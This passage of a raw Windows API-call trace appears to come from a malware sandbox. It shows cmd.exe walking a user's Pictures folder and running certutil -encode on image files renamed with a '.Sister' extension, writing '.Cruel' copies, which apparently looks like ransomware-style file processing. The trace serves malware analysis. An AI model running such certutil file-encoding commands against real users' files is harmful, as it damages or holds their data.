_String2="ComSpec", _MaxCount=0x7) returned 3 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0300.900] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0300.901] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0300.901] GetProcessHeap () returned 0x21ed8c70000 [0300.901] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45c80) returned 1 [0300.901] GetProcessHeap () returned 0x21ed8c70000 [0300.901] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c958c0 [0300.902] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0300.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0300.902] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0300.902] _get_osfhandle (_FileHandle=0) returned 0x4c [0300.902] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0300.903] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1304, dwThreadId=0xecc)) returned 1 [0300.913] CloseHandle (hObject=0xa8) returned 1 [0300.913] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0300.913] GetProcessHeap () returned 0x21ed8c70000 [0300.914] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0300.914] GetEnvironmentStringsW () returned 0x21ed937e320* [0300.914] GetProcessHeap () returned 0x21ed8c70000 [0300.914] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0300.914] FreeEnvironmentStringsA (penv="=") returned 1 [0300.914] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0301.469] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0301.469] CloseHandle (hObject=0xa4) returned 1 [0301.470] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0301.470] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0301.470] GetProcessHeap () returned 0x21ed8c70000 [0301.470] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0301.470] GetEnvironmentStringsW () returned 0x21ed937e320* [0301.470] GetProcessHeap () returned 0x21ed8c70000 [0301.470] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0301.470] FreeEnvironmentStringsA (penv="=") returned 1 [0301.470] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.478] GetProcessHeap () returned 0x21ed8c70000 [0301.478] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0301.478] GetEnvironmentStringsW () returned 0x21ed937e320* [0301.478] GetProcessHeap () returned 0x21ed8c70000 [0301.478] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0301.478] FreeEnvironmentStringsA (penv="=") returned 1 [0301.478] GetProcessHeap () returned 0x21ed8c70000 [0301.478] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c958c0) returned 1 [0301.479] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0301.479] ??_V@YAXPEAX@Z () returned 0x1 [0301.479] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="RPjY4uqao.bmp.Sister", cAlternateFileName="")) returned 1 [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.479] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45640, Size=0x25a) returned 0x21ed8d45640 [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.479] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45640) returned 0x25a [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0dc0 [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.479] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0dc0, Size=0x58) returned 0x21ed93b0dc0 [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.479] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0dc0) returned 0x58 [0301.479] GetProcessHeap () returned 0x21ed8c70000 [0301.480] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0e30 [0301.480] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0301.480] GetProcessHeap () returned 0x21ed8c70000 [0301.480] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bdf0 [0301.480] ??_V@YAXPEAX@Z () returned 0x1 [0301.480] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0301.480] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce20 [0301.481] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0301.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cd60 [0301.481] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0301.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xde37cb6d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xde37cb6d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cac0 [0301.482] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0301.483] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="RPjY4uqao.bmp.Sister", cAlternateFileName="RPJY4U~1.SIS")) returned 0x21ed8c7d000 [0301.483] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0301.483] _wcsnicmp (_String1="RPJY4U~1.SIS", _String2="RPjY4uqao.bmp.Sister", _MaxCount=0x14) returned 13 [0301.483] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0301.483] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0301.483] GetProcessHeap () returned 0x21ed8c70000 [0301.483] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8910 [0301.489] ??_V@YAXPEAX@Z () returned 0x1 [0301.489] ??_V@YAXPEAX@Z () returned 0x1 [0301.489] GetProcessHeap () returned 0x21ed8c70000 [0301.489] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0e30, Size=0x1c0) returned 0x21ed93b0e30 [0301.489] GetProcessHeap () returned 0x21ed8c70000 [0301.489] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0e30) returned 0x1c0 [0301.489] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0301.489] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.489] GetFileType (hFile=0x50) returned 0x2 [0301.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.490] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0301.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.491] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0301.498] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0301.498] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0301.498] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0301.498] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0301.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.498] GetFileType (hFile=0x50) returned 0x2 [0301.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.498] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0301.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.499] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0301.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.499] GetFileType (hFile=0x50) returned 0x2 [0301.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.499] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0301.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.500] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0dd0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0dd0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0301.500] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\" ") returned 54 [0301.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.500] GetFileType (hFile=0x50) returned 0x2 [0301.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.500] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0301.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.501] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x36) returned 1 [0301.501] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0301.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.501] GetFileType (hFile=0x50) returned 0x2 [0301.501] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.501] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0301.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.502] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0301.521] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0301.522] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0301.522] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0301.522] malloc (_Size=0xffce) returned 0x21eda100000 [0301.522] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0301.522] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0301.522] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0301.522] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0301.522] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0301.522] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0301.522] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0301.522] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0301.522] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0301.522] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0301.522] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0301.522] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0301.522] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0301.523] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0301.523] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0301.523] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0301.523] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0301.523] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0301.523] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0301.523] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0301.523] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0301.523] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0301.523] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0301.523] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0301.523] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0301.523] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0301.523] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0301.523] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0301.523] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0301.523] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0301.524] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0301.524] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0301.524] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0301.524] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0301.524] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0301.524] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0301.524] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0301.524] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0301.524] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0301.524] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0301.524] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0301.524] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0301.524] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0301.524] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0301.524] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0301.524] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0301.524] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0301.525] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0301.525] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0301.525] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0301.525] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0301.525] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0301.525] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0301.525] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0301.525] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0301.525] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0301.525] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0301.525] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0301.525] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0301.525] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0301.525] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0301.525] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0301.525] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0301.525] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0301.525] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0301.526] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0301.526] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0301.526] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0301.526] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0301.526] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0301.526] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0301.526] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0301.526] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0301.526] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0301.526] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0301.526] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0301.526] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0301.526] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0301.526] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0301.526] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0301.526] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0301.526] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0301.527] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0301.527] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0301.527] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0301.527] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0301.527] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0301.527] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0301.527] ??_V@YAXPEAX@Z () returned 0x1 [0301.527] GetProcessHeap () returned 0x21ed8c70000 [0301.527] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d19930 [0301.527] GetProcessHeap () returned 0x21ed8c70000 [0301.528] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8e) returned 0x21ed8d44720 [0301.528] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0301.528] malloc (_Size=0xffce) returned 0x21eda100000 [0301.528] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0301.528] GetProcessHeap () returned 0x21ed8c70000 [0301.528] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92800f0 [0301.529] SetErrorMode (uMode=0x0) returned 0x0 [0301.529] SetErrorMode (uMode=0x1) returned 0x0 [0301.529] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9280100, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0301.529] SetErrorMode (uMode=0x0) returned 0x1 [0301.529] GetProcessHeap () returned 0x21ed8c70000 [0301.529] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92800f0, Size=0x54) returned 0x21ed92800f0 [0301.529] GetProcessHeap () returned 0x21ed8c70000 [0301.529] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92800f0) returned 0x54 [0301.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0301.529] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.530] GetProcessHeap () returned 0x21ed8c70000 [0301.530] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed937d1e0 [0301.530] GetProcessHeap () returned 0x21ed8c70000 [0301.530] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d437f0 [0301.530] GetProcessHeap () returned 0x21ed8c70000 [0301.530] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d437f0, Size=0x1c0) returned 0x21ed937de90 [0301.530] GetProcessHeap () returned 0x21ed8c70000 [0301.530] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937de90) returned 0x1c0 [0301.530] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.530] GetProcessHeap () returned 0x21ed8c70000 [0301.530] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95cd0 [0301.531] GetProcessHeap () returned 0x21ed8c70000 [0301.531] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95cd0, Size=0x7e) returned 0x21ed8c95cd0 [0301.531] GetProcessHeap () returned 0x21ed8c70000 [0301.531] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95cd0) returned 0x7e [0301.531] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.531] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, 